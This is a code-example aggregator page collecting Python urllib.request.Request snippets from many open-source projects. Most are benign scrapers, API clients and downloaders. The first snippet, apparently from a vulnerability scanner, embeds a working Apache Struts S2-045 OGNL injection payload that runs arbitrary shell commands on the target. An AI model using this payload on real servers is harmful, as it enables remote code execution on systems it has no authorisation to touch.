Python Examples of urllib.request.Request

Source File: apache_struts_all.py From Vxscan with Apache License 2.0

7 votes

def st045(self):
        try:
            cmd = self.linux
            header = dict()
            header[
                "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
            header[
                "Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + cmd + "'):(#cmd='" + cmd + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
            r = request.Request(self.url, headers=header)
            text = request.urlopen(r).read()
        except http.client.IncompleteRead as e:
            text = e.partial
        except Exception:
            pass
        if 'text' in locals().keys():
            self.random = str(self.random)
            if self.random.encode('utf-8') in text and len(text) < 15:
                self.result.append('Apache S2-045 Vulnerability: ' + self.url)

Source File: githubpy.py From osint-scraper with MIT License

7 votes

def get_access_token(self, code, state=None):
        '''
        In callback url: http://host/callback?code=123&state=xyz
        use code and state to get an access token.
        '''
        kw = dict(client_id=self._client_id, client_secret=self._client_secret, code=code)
        if self._redirect_uri:
            kw['redirect_uri'] = self._redirect_uri
        if state:
            kw['state'] = state
        opener = build_opener(HTTPSHandler)
        request = Request('https://github.com/login/oauth/access_token', data=_encode_params(kw))
        request.get_method = _METHOD_MAP['POST']
        request.add_header('Accept', 'application/json')
        try:
            response = opener.open(request, timeout=TIMEOUT)
            r = _parse_json(response.read())
            if 'error' in r:
                raise ApiAuthError(str(r.error))
            return str(r.access_token)
        except HTTPError as e:
            raise ApiAuthError('HTTPError when get access token')

Source File: log_json.py From dionaea with GNU General Public License v2.0

6 votes

def submit(self, data):
        from urllib.request import Request, urlopen
        data = json.dumps(data)
        data = data.encode("ASCII")
        req = Request(
            self.url,
            data=data,
            headers={
                "Content-Type": "application/json"
            }
        )
        # ToDo: parse response
        response = urlopen(req)
        # Debug:
        #from pprint import pprint
        #pprint(response)

Source File: crawler_yahoo_bs4.py From ir with Mozilla Public License 2.0

6 votes

def busca_preco_atual(ticker):
    if ticker in __cache__:
        return __cache__[ticker]
    try:
        ticker_sa = ticker + '.SA'
        url = "http://finance.yahoo.com/quote/%s?p=%s" % (ticker_sa, ticker_sa)

        # Making the website believe that you are accessing it using a Mozilla browser
        req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
        webpage = urlopen(req).read()

        time.sleep(1)

        soup = BeautifulSoup(webpage, 'html.parser')
        # html = soup.prettify('utf-8')

        for span in soup.findAll('span', attrs={'class': 'Trsdu(0.3s) Trsdu(0.3s) Fw(b) Fz(36px) Mb(-4px) D(b)'}):
            preco_atual = float(span.text.replace(',', '').strip())
            __cache__[ticker] = preco_atual
            return preco_atual
        raise Exception('Preco ticker nao encontrado ' + ticker)
    except Exception as ex:
        raise Exception('Preco ticker nao encontrado ' + ticker, ex)

Source File: crawler_funds_explorer_bs4.py From ir with Mozilla Public License 2.0

6 votes

def e_tipo_fii(ticker):

    ticker_corrigido = ticker

    if ticker.endswith('12'):
        ticker_corrigido = ticker.replace('12', '11')

    try:
        url = "https://www.fundsexplorer.com.br/funds/%s" % (ticker_corrigido)

        # Making the website believe that you are accessing it using a Mozilla browser
        req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
        webpage = urlopen(req).read()

        soup = BeautifulSoup(webpage, 'html.parser')
        # html = soup.prettify('utf-8')

        titles = soup.findAll('h1', attrs={'class': 'section-title'})
        if len(titles):
            return True
        else:
            return False
    except:
        return False

Source File: client.py From d6tpipe with MIT License

6 votes

def _make_request(self, opener, request, timeout=None):
        """Make the API call and return the response. This is separated into
           it's own function, so we can mock it easily for testing.

        :param opener:
        :type opener:
        :param request: url payload to request
        :type request: urllib.Request object
        :param timeout: timeout value or None
        :type timeout: float
        :return: urllib response
        """
        timeout = timeout or self.timeout
        try:
            return opener.open(request, timeout=timeout)
        except HTTPError as err:
            exc = handle_error(err)
            return exc

Source File: zooqle.py From search-plugins with GNU General Public License v2.0

6 votes

def retrieve_url_nodecode(url):
    """ Return the content of the url page as a string """
    req = Request(url, headers=headers)
    try:
        response = urlopen(req)
    except URLError as errno:
        print(" ".join(("Connection error:", str(errno.reason))))
        print(" ".join(("URL:", url)))
        return ""
    dat = response.read()
    # Check if it is gzipped
    if dat[:2] == '\037\213':
        # Data is gzip encoded, decode it
        compressedstream = StringIO(dat)
        gzipper = gzip.GzipFile(fileobj=compressedstream)
        extracted_data = gzipper.read()
        dat = extracted_data
        return dat
    return dat

Source File: zooqle.py From search-plugins with GNU General Public License v2.0

6 votes

def retrieve_url_nodecode(url):
    """ Return the content of the url page as a string """
    req = Request(url, headers=headers)
    try:
        response = urlopen(req)
    except URLError as errno:
        print(" ".join(("Connection error:", str(errno.reason))))
        print(" ".join(("URL:", url)))
        return ""
    dat = response.read()
    # Check if it is gzipped
    if dat[:2] == '\037\213':
        # Data is gzip encoded, decode it
        compressedstream = StringIO(dat)
        gzipper = gzip.GzipFile(fileobj=compressedstream)
        extracted_data = gzipper.read()
        dat = extracted_data
        return dat
    return dat

Source File: connection.py From dot2moon with MIT License

6 votes

def post(self, payload, request_par):
        data = parse.urlencode(request_par).encode()

        if self.UserAgent != None:
            req = Request(
                    self.target_url,
                    data=data, 
                    headers={"User-Agent":self.UserAgent})
            conn = urlopen(req, timeout=self.TimeOut)
        else:
            conn = urlopen(self.target_url,
                    data=data,
                    timeout=self.TimeOut)

        html = conn.read().decode("utf-8")
        page_size = len(html)

        if self.verbose == True:
            print(" [+] Source code got from %s" % payload)
            print("----START" + "-"*71)
            print(html)
            print("----END" + "-"*73)
        
        return(self.target_url, page_size, html, payload)

Source File: connection.py From dot2moon with MIT License

6 votes

def HTML(self, check):
        try:
            if self.UserAgent != None:
                page_html = urlopen(Request(
                        self.target_url,
                        headers={"User-Agent":self.UserAgent}),
                        timeout=self.TimeOut).read().decode("utf-8")

            #If not, the default will be used
            else:
                page_html = urlopen(
                        self.target_url,
                        timeout=self.TimeOut).read().decode("utf-8")

        except HTTPError:
            page_html = "Can't get page source code"

        if self.verbose == True:
            print(" [+] Source code got from %s" % self.target_url)
            print("----START" + "-"*71)
            print(page_html)
            print("----END" + "-"*73)

        return(page_html)

Source File: load.py From pySHACL with Apache License 2.0

6 votes

def get_rdf_from_web(url):
    headers = {'Accept':
               'text/turtle, application/rdf+xml, '
               'application/ld+json, application/n-triples,'
               'text/plain'}
    r = request.Request(url, headers=headers)
    resp = request.urlopen(r)
    code = resp.getcode()
    if not (200 <= code <= 210):
        raise RuntimeError("Cannot pull RDF URL from the web: {}, code: {}"
                           .format(url, str(code)))
    known_format = None
    content_type = resp.headers.get('Content-Type', None)
    if content_type:
        if content_type.startswith("text/turtle"):
            known_format = "turtle"
        elif content_type.startswith("application/rdf+xml"):
            known_format = "xml"
        elif content_type.startswith("application/xml"):
            known_format = "xml"
        elif content_type.startswith("application/ld+json"):
            known_format = "json-ld"
        elif content_type.startswith("application/n-triples"):
            known_format = "nt"
    return resp, known_format

Source File: utils.py From script.module.inputstreamhelper with MIT License

6 votes

def _http_request(url, headers=None, time_out=10):
    """Perform an HTTP request and return request"""
    log(0, 'Request URL: {url}', url=url)

    try:
        if headers:
            request = Request(url, headers=headers)
        else:
            request = Request(url)
        req = urlopen(request, timeout=time_out)
        log(0, 'Response code: {code}', code=req.getcode())
        if 400 <= req.getcode() < 600:
            raise HTTPError('HTTP %s Error for url: %s' % (req.getcode(), url), response=req)
    except (HTTPError, URLError) as err:
        log(2, 'Download failed with error {}'.format(err))
        if yesno_dialog(localize(30004), '{line1}\n{line2}'.format(line1=localize(30063), line2=localize(30065))):  # Internet down, try again?
            return _http_request(url, headers, time_out)
        return None

    return req

Source File: recording.py From ReolinkCameraAPI with GNU General Public License v3.0

6 votes

def get_snap(self, timeout: int = 3) -> Image or None:
        """
        Gets a "snap" of the current camera video data and returns a Pillow Image or None
        :param timeout: Request timeout to camera in seconds
        :return: Image or None
        """
        randomstr = ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
        snap = self.url + "?cmd=Snap&channel=0&rs=" \
               + randomstr \
               + "&user=" + self.username \
               + "&password=" + self.password
        try:
            req = request.Request(snap)
            req.set_proxy(Request.proxies, 'http')
            reader = request.urlopen(req, timeout)
            if reader.status == 200:
                b = bytearray(reader.read())
                return Image.open(io.BytesIO(b))
            print("Could not retrieve data from camera successfully. Status:", reader.status)
            return None

        except Exception as e:
            print("Could not get Image data\n", e)
            raise

Source File: character_stoke_handian.py From corpus_process_script with Apache License 2.0

6 votes

def post_baidu(self, url):
        """
        :param url:
        :return:
        """
        try:
            timeout = 10
            # request = urllib2.Request(url)
            request = urllib2.Request(url)
            request.add_header('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36')
            request.add_header('connection','keep-alive')
            request.add_header('referer', url)
            response = urllib2.urlopen(request, timeout=timeout)
            html = response.read()
            response.close()
            return html
        except Exception as e:
            print('URL Request Error:', e)
            return None

Source File: __init__.py From pyhanlp with Apache License 2.0

6 votes

def hanlp_releases(cache=True):
    global HANLP_RELEASES
    if cache and HANLP_RELEASES:
        return HANLP_RELEASES
    # print('Request GitHub API')
    req = urllib.Request('http://nlp.hankcs.com/download.php?file=version')
    req.add_header('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36')
    if PY == 3:
        content = urllib.urlopen(req).read()
    else:
        content = urllib.urlopen(req).read()
    content = json.loads(content.decode())
    jar_version, jar_url, data_version, data_url = content
    meta = [(jar_version, jar_url, data_version, data_url)]
    HANLP_RELEASES = meta
    return meta

Source File: pubchem.py From QCElemental with BSD 3-Clause "New" or "Revised" License

6 votes

def get_sdf(self):
        """Function to return the SDF (structure-data file) of the PubChem object."""
        from urllib.request import urlopen, Request
        from urllib.parse import quote
        from urllib.error import URLError

        if len(self.dataSDF) == 0:
            url = "https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/cid/{}/SDF?record_type=3d".format(
                quote(str(self.cid))
            )
            req = Request(url, headers={"Accept": "chemical/x-mdl-sdfile"})
            try:
                self.dataSDF = urlopen(req).read().decode("utf-8")
            except URLError as e:
                msg = "Unable to open\n\n%s\n\ndue to the error\n\n%s\n\n" % (url, e)
                msg += "It is possible that 3D information does not exist for this molecule in the PubChem database\n"
                print(msg)
                raise ValidationError(msg)
        return self.dataSDF

Source File: deadseeker.py From Broken-Link-Crawler with MIT License

6 votes

def handle_link(self, link):
        '''Send a HEAD request to the link, catch any pesky errors'''
        if not bool(urlparse(link).netloc):  # relative link?
            link = urljoin(self.home, link)
        try:
            req = Request(link, headers={'User-Agent': agent}, method='HEAD')
            status = request.urlopen(req).getcode()
        except urllib.error.HTTPError as e:
            print(f'HTTPError: {e.code} - {link}')  # (e.g. 404, 501, etc)
        except urllib.error.URLError as e:
            print(f'URLError: {e.reason} - {link}')  # (e.g. conn. refused)
        except ValueError as e:
            print(f'ValueError {e} - {link}')  # (e.g. missing protocol http)
        else:
            if self.verbose:
                print(f'{status} - {link}')
        if self.home in link:
            self.pages_to_check.appendleft(link)


# check for verbose tag

Source File: L.E.S.M.A. - Fabrica de Noobs Speedtest.py From L.E.S.M.A with Apache License 2.0

6 votes

def build_request(url, data=None, headers=None, bump=''):
	"""Build a urllib2 request object

	This function automatically adds a User-Agent header to all requests

	"""

	if not USER_AGENT:
		build_user_agent()

	if not headers:
		headers = {}

	if url[0] == ':':
		schemed_url = '%s%s' % (SCHEME, url)
	else:
		schemed_url = url

	if '?' in url:
		delim = '&'
	else:
		delim = '?'

	# WHO YOU GONNA CALL? CACHE BUSTERS!
	final_url = '%s%sx=%s.%s' % (schemed_url, delim,
								 int(timeit.time.time() * 1000),
								 bump)

	headers.update({
		'User-Agent': USER_AGENT,
		'Cache-Control': 'no-cache',
	})

	printer('%s %s' % (('GET', 'POST')[bool(data)], final_url),
			debug=True)

	return Request(final_url, data=data, headers=headers)

Source File: github.py From loghub with MIT License

5 votes

def _http(self, _method, _path, **kw):
        data = None
        params = None
        if _method == 'GET' and kw:
            _path = '%s?%s' % (_path, _encode_params(kw))
        if _method in ['POST', 'PATCH', 'PUT']:
            data = bytes(_encode_json(kw), 'utf-8')
        url = '%s%s' % (_URL, _path)
        opener = build_opener(HTTPSHandler)
        request = Request(url, data=data)
        request.get_method = _METHOD_MAP[_method]
        if self._authorization:
            request.add_header('Authorization', self._authorization)
        if _method in ['POST', 'PATCH', 'PUT']:
            request.add_header('Content-Type',
                               'application/x-www-form-urlencoded')

        class Resp():
            code = None

        resp = Resp()
        req = None

        try:
            response = opener.open(request, timeout=TIMEOUT)
            is_json = self._process_resp(response.headers)
            if is_json:
                return _parse_json(response.read().decode('utf-8'))
        except HTTPError as e:
            is_json = self._process_resp(e.headers)
            if is_json:
                json = _parse_json(e.read().decode('utf-8'))
            else:
                json = e.read().decode('utf-8')
            req = JsonObject(method=_method, url=url)
            resp = JsonObject(code=e.code, json=json)
        finally:
            if resp.code == 404:
                raise ApiNotFoundError(url, req, resp)
            elif req:
                raise ApiError(url, req, resp)

Source File: githubpy.py From osint-scraper with MIT License

5 votes

def _http(self, _method, _path, **kw):
        data = None
        params = None
        if _method=='GET' and kw:
            _path = '%s?%s' % (_path, _encode_params(kw))
        if _method in ['POST', 'PATCH', 'PUT']:
            data = bytes(_encode_json(kw), 'utf-8')
        url = '%s%s' % (_URL, _path)
        opener = build_opener(HTTPSHandler)
        request = Request(url, data=data)
        request.get_method = _METHOD_MAP[_method]
        if self._authorization:
            request.add_header('Authorization', self._authorization)
        if _method in ['POST', 'PATCH', 'PUT']:
            request.add_header('Content-Type', 'application/x-www-form-urlencoded')
        try:
            response = opener.open(request, timeout=TIMEOUT)
            is_json = self._process_resp(response.headers)
            if is_json:
                return _parse_json(response.read().decode('utf-8'))
        except HTTPError as e:
            is_json = self._process_resp(e.headers)
            if is_json:
                json = _parse_json(e.read().decode('utf-8'))
            else:
                json = e.read().decode('utf-8')
            req = JsonObject(method=_method, url=url)
            resp = JsonObject(code=e.code, json=json)
            if resp.code==404:
                raise ApiNotFoundError(url, req, resp)
            raise ApiError(url, req, resp)

Source File: search.py From rules-bot with GNU Affero General Public License v3.0

5 votes

def parse_docs(self):
        request = Request(urljoin(DOCS_URL, "objects.inv"),
                          headers={'User-Agent': USER_AGENT})
        docs_data = urlopen(request)
        self._docs = InventoryFile.load(docs_data, DOCS_URL, urljoin)

Source File: infolog.py From vae_tacotron with MIT License

5 votes

def _send_slack(msg):
  req = Request(_slack_url)
  req.add_header('Content-Type', 'application/json')
  urlopen(req, json.dumps({
    'username': 'tacotron',
    'icon_emoji': ':taco:',
    'text': '*%s*: %s' % (_run_name, msg)
  }).encode())

Source File: character_stoke.py From corpus_process_script with Apache License 2.0

5 votes

def post_baidu(self, url):
        try:
            timeout = 5
            request = urllib2.Request(url)
            request.add_header('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36')
            request.add_header('connection','keep-alive')
            request.add_header('referer', url)
            response = urllib2.urlopen(request, timeout=timeout)
            html = response.read()
            response.close()
            return html
        except Exception as e:
            print('URL Request Error:', e)
            return None

Source File: activity-debug-1.py From coding-skills-sample-code with Apache License 2.0

5 votes

def get_content(uri):
    req = Request(uri)
    req.add_header('Authorization', 'Basic bGVhcm5pbmc6bGVhcm5pbmc=')
    req.add_header('Accept', 'application/json')
    response = urlopen(req)
    response_string = response.read().decode("utf-8")
    response.close()
    return response_string

Source File: data_spider.py From dialogbot with Apache License 2.0

5 votes

def get_html(self, url):
        """
        根据url，请求html
        :param url: url
        :return:
        """
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
                                 'Chrome/51.0.2704.63 Safari/537.36'}
        req = request.Request(url=url, headers=headers)
        res = request.urlopen(req)
        html = res.read().decode('gbk')
        return html

Source File: utils.py From 2D-kinectics with MIT License

5 votes

def get_blocked_videos(api=API):
    api_url = '{}?action=get_blocked'.format(api)
    req = urllib2.Request(api_url)
    response = urllib2.urlopen(req)
    return json.loads(response.read())

Source File: get_banner.py From games_nebula with GNU General Public License v3.0

5 votes

def get_banner(game_name, url, banner_path, lib):

    banner_req = urllib_request(url)

    try:

        if not os.path.exists(banner_path):
            os.makedirs(banner_path)

        banner_data = urllib_urlopen(banner_req).read()
        banner_file = open(banner_path + '/' + game_name + '.jpg', 'wb')
        banner_file.write(banner_data)
        banner_file.close()

        pic_src = Image.open(banner_path + '/' + game_name + '.jpg')
        pic = pic_src.resize((518, 240), PIL.Image.ANTIALIAS)
        pic.save(banner_path + '/' + game_name + '.jpg')

        if lib == 'goglib':

            if not os.path.exists(banner_path + '/unavailable/'):
                os.makedirs(banner_path + '/unavailable/')

            new_pic = Image.open(banner_path + '/' + game_name + '.jpg')
            pic_grey = new_pic.convert('L')
            pic_grey.save(banner_path + '/unavailable/' + game_name + '.jpg')

    except urllib_urlerror as e:
        print(e.reason)
    except urllib_httperror as e:
        print(e.code)
        print(e.read())

Source File: goglib_get_banner.py From games_nebula with GNU General Public License v3.0

5 votes

def goglib_get_banner(banner_path, unavailable_path, game_id, *args):

    banner_height = 240
    game_name = os.path.basename(banner_path).split('.jpg')[0]
    print("Getting picture for: '" + game_name + "'")

    try:
        token_path = os.getenv('HOME') + '/.config/lgogdownloader/galaxy_tokens.json'
        token = Token.from_file(token_path)
        if token.expired():
            token.refresh()
            token.save(token_path)
        api = GogApi(token)

        prod = api.product(game_id)
        prod.update_galaxy(expand=True)
        banner_url = 'https:' + ''.join(prod.image_logo.split('_glx_logo'))

        banner_req = urllib_request(banner_url)
        banner_data = urllib_urlopen(banner_req).read()
        banner_file = open(banner_path, 'wb')
        banner_file.write(banner_data)
        banner_file.close()

        pic_src = Image.open(banner_path)
        scale_lvl = banner_height/float(pic_src.size[1])
        scaled_width = int(float(pic_src.size[0])*scale_lvl)
        pic = pic_src.resize((scaled_width, banner_height), PIL.Image.ANTIALIAS)
        pic.save(banner_path)
        pic = pic.convert('L')
        pic.save(unavailable_path)

    except urllib_urlerror as e:
        print(e.reason)
    except urllib_httperror as e:
        print(e.code)
        print(e.read())
    except:
        goglib_recreate_banner.goglib_recreate_banner(game_name, banner_path)

Source File: deadseeker.py From Broken-Link-Crawler with MIT License

5 votes

def scanner(self):
        '''Loop through remaining pages, looking for HTML responses'''
        while self.pages_to_check:
            page = self.pages_to_check.pop()
            req = Request(page, headers={'User-Agent': agent})
            res = request.urlopen(req)
            if 'html' in res.headers['content-type']:
                with res as f:
                    body = f.read().decode('utf-8', errors='ignore')
                    self.feed(body)

Source File: goglib_get_icon.py From games_nebula with GNU General Public License v3.0

5 votes

def goglib_get_icon(game_name, icon_url, path):

    icon_req = urllib_request(icon_url)
    icon_data = urllib_urlopen(icon_req).read()
    icon_file = open(path + '/' + game_name + '.jpg', 'wb')
    icon_file.write(icon_data)
    icon_file.close()

    #pic_src = Image.open(path + '/' + game_name + '.jpg')
    #scale_lvl = 64/float(pic_src.size[0])
    #scaled_height = int(float(pic_src.size[1])*scale_lvl)
    #pic = pic_src.resize((64, scaled_height), PIL.Image.ANTIALIAS)
    #pic.save(path + '/' + game_name + '.jpg')

Python urllib.request.Request() Examples